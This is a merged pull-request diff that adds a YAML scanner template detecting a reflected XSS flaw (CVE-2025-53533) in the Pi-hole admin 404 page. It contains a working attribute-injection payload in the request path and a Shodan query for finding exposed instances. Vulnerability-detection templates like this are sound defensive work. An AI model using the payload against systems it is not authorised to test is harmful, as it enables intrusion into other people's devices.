Skip to content
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
49 changes: 49 additions & 0 deletions http/cves/2025/CVE-2025-53533.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,49 @@
id: CVE-2025-53533

info:
name: Pi-hole Reflected XSS in 404-Error Page
author: DhiyaneshDk
severity: medium
description: |
Pi-hole Admin Interface <= 6.2.1 contains a reflected XSS vulnerability on the 404 error page. The URL path is reflected unsanitized into the `class` attribute of the `body` tag, allowing attribute injection via a crafted URL to execute arbitrary JavaScript in victim browsers.
impact: |
Attackers can execute arbitrary JavaScript in victim browsers, potentially stealing cookies or performing actions on behalf of the user.
remediation: Update to Pi-hole web interface version 6.3 or later.
reference:
- https://github.com/pi-hole/web/security/advisories/GHSA-w8f8-92rx-4f6w
- https://nvd.nist.gov/vuln/detail/CVE-2025-53533
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-53533
cwe-id: CWE-79
epss-score: 0.00029
epss-percentile: 0.08158
metadata:
verified: true
max-request: 1
vendor: pi-hole
product: web_interface
shodan-query: title:"Pi-hole"
tags: cve,cve2025,pihole,xss

http:
- method: GET
path:
- '{{BaseURL}}/"onload=alert(document.domain);>'

matchers-condition: and
matchers:
- type: word
part: body
words:
- '"onload=alert(document.domain);>">'

- type: word
part: body
words:
- "pi-hole"

- type: status
status:
- 404
Loading